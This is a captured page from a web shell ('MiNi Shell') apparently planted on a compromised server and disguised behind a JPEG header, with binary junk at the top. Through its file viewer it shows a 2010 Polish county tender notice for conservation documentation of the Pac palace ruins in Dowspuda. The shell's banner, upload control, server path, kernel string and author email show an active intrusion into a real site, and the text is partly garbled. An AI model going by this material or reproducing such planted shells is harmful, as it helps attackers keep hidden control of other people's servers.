JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100413/103734-N-2010.html

<p class="kh_header"><b>Suwałki: Dokumentacja na prace remontowo-konserwatorskie ruin pałacu Paca w Dowspudzie  opracowywana w ramach projektu: Konserwacja i restauracja zabytków architektury XIX wieku pogranicza polsko-litewskiego- etap I/ (SPF/2009/PL/10)</b><br>
<b>Numer ogłoszenia: 103734 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Suwalski , ul. Świerkowa 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5659200, faks 087 5664716.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.suwalski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja na prace remontowo-konserwatorskie ruin pałacu Paca w Dowspudzie  opracowywana w ramach projektu: Konserwacja i restauracja zabytków architektury XIX wieku pogranicza polsko-litewskiego- etap I/ (SPF/2009/PL/10).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dokumentacja na prace remontowo-konserwatorskie  ruin pałacu Paca w Dowspudzie. Powinna zawierać  w oparciu o wytyczne z projektu SPF/PL/2009/10, takie dokumenty jak:
- ekspertyza mykologiczno-konstrukcyjna, 
- inwentaryzacja dla celów projektowych, 
- program prac konserwatorskich,
- dokumentacja projektowa remontu i adaptacji istniejących pomieszczeń  (W dokumentacji również opracowanie kosztorysów na zaprojektowane prace)

Wykonawca   opracuje w ramach przedmiotowego zamówienia kartę informacyjną opisu przedsięwzięcia znajdującego się w bezpośrednim sąsiedztwie obszaru Natura 2000 celem uzyskanai decyzji o środowiskowych uwarunkowaniach, jeżeli będzie taka wymagana,  uzgodni z konserwatorem zabytków  ostateczny program funkcjonalno-użytkowy zabytku   a także przygotuje w imieniu Zamawiającego inne wymagane prawem wnioski do służb ochrony zabytków w zakresie prac objętych przedmiotowym zamówieniem.  Dokumentacja opracowana w wyniku niniejszego postępowania powinna być kompletna, zgodna z obowiązującymi przepisami, i umożliwiająca uzyskanie pozwolenia na budowę. Powinna również spełniać wymogi zgodnie z przepisami dotyczącymi ochrony zabytków i ochrony środowiska. Wykonawca na swój koszt zleci opracowanie mapy do celów projektowych. 
Wykonawca sporządzi  Kosztorysy do przetargu na wybór wykonawcy robót metodą uproszczoną  wg formuły:
      Ck= S L*Cj+PV 
gdzie:
Ck - oznacza cenę kosztorysową,
L- oznacza liczby ustalonych jednostek przedmiarowych,
Cj - oznacza ceny jednostkowe scalone dla ustalonych jednostek przedmiarowych,
PV - oznacza podatek od towarów i usług (VAT)
W kosztorysach powinny wystąpić tabele elementów scalonych, wartości netto, brutto i podatek VAT
W kosztorysach powinny wystąpić tabele elementów scalonych, wartości netto, brutto i podatek VAT

Ruiny pałacu Paca w Dowspudzie to obiekt ten wpisany jest do rejestru zabytków woj. podlaskiego pod numerem A-230 jako pozostałości zespołu pałacowego w Dowspudzie, gm. Raczki. Kartę ewidencyjną zabytku prowadzi Wojewódzki Urząd Ochrony Zabytków w Białymstoku, Delegatura w Suwałkach, ul. Sejneńska 13. W/g  powyższego  dokumentu  obiekt  jest w stanie ruiny. Zachowały się jedynie piwnice, wieżyczka flankująca oraz  podjazd. Nad częścią piwnic  znajduje się  budynek .
Zamawiający przekazuje wraz z SIWZ:
-Program funkcjonalno- użytkowy
-Pozwolenie WUOZ w Białymstoku Delegatura w Suwałkach z dnia 26.02.2010 roku znak: SZN-MG/40301-18/10
-Wypis z rejestru gruntów działki 93/6
-Mapę sytuacyjno-wysokościową do celów projektowych w skali 1:500 sporządzoną 15.10.2008 roku.
-Postanowienie z dn. 19.06.2009 roku znak: RN-RS/4010-1/09 wraz z załącznikiem graficznym.
- pismo z dnia 08.04.2010 roku z WUOZ w Białymstoku, Delegatura w Suwałkach znak: SZN-MB/40301-32/10
Opinia i zalecenia konserwatorskie znak: ZNS/ST/40301/40312/6/08 z dnia 25.01.2008 r.
Planowany program funkcjonalno-użytkowy wykorzystania pozostałości ruin pałacu Ludwika Michała Paca w Dowspudzie.
Zadaszone pomieszczenie pałacu na wysokości parteru przeznaczyć na cele galerii wystawienniczej połączonej z prowadzeniem punktu informacji turystycznej.
W piwnicach górnych umożliwić prowadzenie  działalności kulturalnej. 
Zaplanować małą salę koncertowo-szkoleniową, pomieszczenia techniczne, magazyny. Część powierzchni powinna zostać przeznaczona na prowadzenie usług gastronomicznych. 
Zarówno w piwnicach, jak i na parterze konieczna jest rozbudowa i modernizacja węzła sanitarnego.
W obu istniejących pomieszczeniach, będzie prowadzona działalność całoroczna, co wymaga  zaprojektowania  systemu ogrzewania i wentylacji.
Dolne piwnice przewidziano jako miejsce magazynowe. Wszystkie istniejące obecnie wejścia do piwnic dolnych powinny być zamknięte i zabezpieczone. 
Wnętrze i otoczenie ruin pałacu, będzie miejscem imprez plenerowych 
o różnorodnym charakterze, przede wszystkim koncertowym (np. Festiwal Celtycki). Planujemy zamontowanie stałej sceny z zadaszeniem w części północnej ruin z doprowadzeniem tam energii elektrycznej systemem podziemnym. Istnieje konieczność  uporządkowania otoczenia pozostałych murów pałacu, w tym odnowienie tarasu widokowego. Obiekt powinien  być  podświetlony i monitorowany kamerami.
W ramach opracowania należy  zaprojektować odwodnienie obiektów oraz zabezpieczenie  wszystkich istniejących w kompleksie elementów. 
Charakterystyka istniejących elementów ruin : 
a/ podjazd, budowla wolnostojąca, murowana,  w rodzaju podcienia na słupach,  długość:17,0m; szerokość 8,0m; wysokość od poziomu terenu 13m; 
b/ piwnice- dwukondygnacyjne, o kubaturze około 415 m3, dojście do piwnic od zewnątrz od strony zachodniej i od zewnątrz od ściany szczytu wschodniego. Dojście do piwnic jest również możliwe w części zachodniej z parteru budynku schodami. Wszystkie pomieszczenia piwniczne posiadają sklepienia ceglane, kolebkowe, odcinkowe  lub krzyżowe. 
c/ wieża, wysokość ok. 18,0m; na rzucie ośmiokątnym, murowana, 
d/  na zachodniej części stropu  nad górną kondygnacją piwnicy znajduje się budynek  parterowy 
Zamawiający informuje, że w budżecie projektu na przedmiot objęty niniejszym zamówieniem przeznaczone jest 29700 euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 79.42.12.00-3, 92.52.20.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca   zapewni jako część swojej oferty wadium w wysokości: 1.000,00 zł (słownie złotych: jeden tysiąc) na całość zamówienia.
Wadium może być wnoszone w jednej lub kilku następujących formach:
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r Nr 42 poz.275).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w Banku Gospodarki Żywnościowej S.A. Oddział Operacyjny w Suwałkach, ul. Kościuszki 54 o numerze: 21 2030 0045 1110 0000 0180 6740  do dnia  21.04.2010 r. do godz. 09:00 (decyduje data wpływu środków na rachunek zamawiającego). Kserokopię dowodu wniesienia wadium należy złożyć w ofercie. 
Wadium w pozostałych formach - oryginały - muszą być wniesione w Biurze Obsługi Klienta  w Starostwie Powiatowym  w Suwałkach, ul. Świerkowa 60.
Oznacza to, że w terminie wniesienia wadium,  muszą zostać złożone ww. formy wadium. Wykonawca  - dla celów dowodowych - powinien uzyskać dla siebie potwierdzenie złożenia wadium w Biurze Obsługi Klienta.
Nie wniesienie wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie Wykonawcy z postępowania. (wadium w terminie otwarcia ofert powinno znaleźć się na rachunku bankowym Zamawiającego). Wadium wniesione w innej formie niż w pieniądzu należy złożyć w  Biurze  Obsługi Klienta w godzinach pracy Starostwa 7.30-15.30.  
Do oferty należy dołączyć kserokopię dowodu o wniesieniu wadium. 
W przypadku oferty  składanej wspólnie przez kilku Wykonawców wadium wpłacają wszystkie podmioty wspólnie albo jeden z nich w imieniu pozostałych podmiotów wspólnie składających ofertę. 

3. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
4. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
5. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy,  który wycofał ofertę przed upływem terminu składania ofert,
6. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca   w odpowiedzi na wezwanie w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących  po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłożenie wykazu  wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi polegające na   opracowaniu:  3 opracowań projektowych wraz z minimum jedną ekspertyzą mykologiczno-konstrukcyjną  i programem prac konserwatorskich, dotyczących  obiektów zabytkowych (wpisanych do rejestru zabytków),  z podaniem ich wartości, przedmiotu, dat wykonania i odbioru, oraz   dokument potwierdzający, że usługi zostały wykonane lub są wykonywane  należycie a ich wartość jest nie  mniejszej mniejsza niż   50000 zł brutto. 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w opracowaniu   zamówienia odpowiedzialnych za poszczególne jego części, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia (doświadczenie polegające na wykonaniu min.  3  opracowań projektowych  wraz z min. 1 ekspertyzą mykologiczno-konstrukcyjną  i programem prac konserwatorskich, dotyczących  obiektów zabytkowych (wpisanych do rejestru zabytków),  w tym  inwentaryzacji budowlanej, dokumentacji projektowej zgodnej z zakresem przedmiotu zamówienia w branży architektoniczno- konstrukcyjno-budowlanej, elektrycznej i sanitarnej ) i  wykształcenia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami: osobą/ lub osobami  posiadającą uprawnienia do: sporządzania programu prac konserwatorskich, ekspertyz mykologicznych, konstrukcyjnych, sporządzania opracowań  dokumentacyjnych dotyczących zabytków w tym  inwentaryzacji budowlanej, dokumentacji projektowej zgodnej z zakresem przedmiotu zamówienia w branży konstrukcyjno-budowlanej, elektrycznej i sanitarnej - na załączniku nr 4

Należy złożyć zaświadczenie o przynależności do  Izby Inżynierów, poświadczone za zgodność kserokopie uprawnień w zakresie branży  architektoniczno- konstrukcyjno-budowlanej, sanitarnej, elektrycznej, oraz dokument uprawniający do opracowania programu  prac konserwatorskich i ekspertyzy mykologicznej.  Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia -na załączniku nr 5. 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oryginał lub poświadczona przez Wykonawcę za zgodność z oryginałami kopia opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.suwalski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> !6-400 Suwałki, ul. Świerkowa 60.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 09:00, miejsce: Starostwo Powiatowe w Suwałkach, u. Świerkowa 60, Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego oraz ze Środków budżetu państwa w ramach Programu Współpracy Transgranicznej Litwa-Polska 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com